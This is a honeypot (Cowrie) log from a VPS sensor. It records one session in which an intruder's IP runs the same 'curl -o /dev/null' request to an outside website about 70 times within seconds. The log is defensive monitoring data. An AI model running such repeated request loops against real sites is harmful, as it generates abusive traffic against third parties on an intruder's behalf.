{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.818682Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.819701Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.866247Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.867285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.903698Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.904681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.955500Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.956345Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.006073Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.007352Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.053734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.055014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.092227Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.093325Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.130842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.131990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.169429Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.170480Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.210451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.211384Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.286234Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.287370Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.325161Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.326206Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.363347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.364198Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.443675Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.444907Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.486828Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.487957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.532051Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.533303Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.571293Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.572366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.619314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.620379Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.689322Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.690686Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.733788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.734844Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.773673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.774718Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.850419Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.851953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.888761Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.889933Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.927216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.928635Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:55.970048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:55.971279Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.011868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.013057Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.056934Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.058102Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.105057Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.106261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.151574Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.152745Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.198117Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.199360Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.239792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.240949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.326297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.327703Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.364848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.366157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.406409Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.407527Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.451542Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.452661Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.496505Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.497910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.550072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.551159Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.594758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.595824Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.632375Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.633458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.674031Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.675040Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.713856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.714870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.758966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.759966Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.801248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.802267Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:56.970218Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:56.971382Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.012268Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.013317Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.050098Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.051094Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.087749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.088828Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.125662Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.126970Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.171075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.172049Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.230629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.231689Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.280760Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.281758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.322416Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.323400Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.428662Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.430055Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.729774Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.730922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.773056Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.774101Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.812333Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.813428Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.851136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.852152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.892668Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.893650Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.931082Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.932045Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:57.970289Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:57.971076Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.012901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.013752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.057468Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.058810Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.096622Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.097528Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.134914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:58.135871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:58.173428Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
